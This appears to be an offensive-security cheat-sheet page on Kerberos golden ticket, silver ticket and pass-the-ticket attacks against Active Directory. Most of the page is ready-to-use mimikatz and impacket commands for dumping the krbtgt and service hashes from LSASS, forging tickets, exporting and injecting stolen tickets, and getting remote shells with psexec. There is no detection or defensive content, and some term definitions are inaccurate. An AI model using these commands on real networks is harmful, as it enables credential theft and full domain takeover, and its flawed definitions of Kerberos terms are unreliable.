golden silver passing ticket

Silver ticket is more stealth and discreet; only for target service
Golden ticket works for any kerberos service

Description of terms:

TGT: ticket to a service account issued by the KDC and can only access that service.
KRBTGT: service account in KDC; issues all TGTs. If possible to impersonate this account and create a golden ticket, we have ability to create a service ticket for any service

Golden Ticket

using mimikatz

# dump hash and SID
lsadump::lsa /inject /name: krbtgt

# create ticket golden
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500

# open a new elevated command prompt with the given ticket in mimikatz.
misc::cmd

using impacket

impacket-ticketer -nthash KRBTGT_NTLM_HASH -domain-sid DOMAIN_SID -domain FQDN_DOMAIN USERNAME
export KRB5CCNAME=FILE.cache
impacket-psexec DOMAIN/USER@DOMAIN -k -no-pass
# can try impacket-secretsdump

Silver Ticket

mimikatz

# dump
lsadump::lsa /inject /name: [<domain-admin-account> | <service-account>]

# create ticket silver
kerberos::golden /user:<USER> /domain:DOMAINM /sid:SID /krbtgt:SERVICE_NTLM_hash /id:1103
misc::cmd

Pass-the-ticket

Can be used for dumping user credentials inside an AD network
Can dump the TGT from the LSASS memory (which stores Kerberos ticket as the gatekeeper and accept or reject the credentials provided)
Gives a .kirbi ticket - can be used to get domain admin
Allows to escalate to domain admin if you dump a domain admin's ticket and then impersonate that ticket

using mimikatz

# exports all .kirbi to current directory
sekurlsa::tickets /export

# find some admin .kirbi from krbtgt
kerberos::ptt TICKET

# to check if ticket is working
> klist

Previousbloodhound Nextgroup policy management

Last updated 4 years ago

Was this helpful?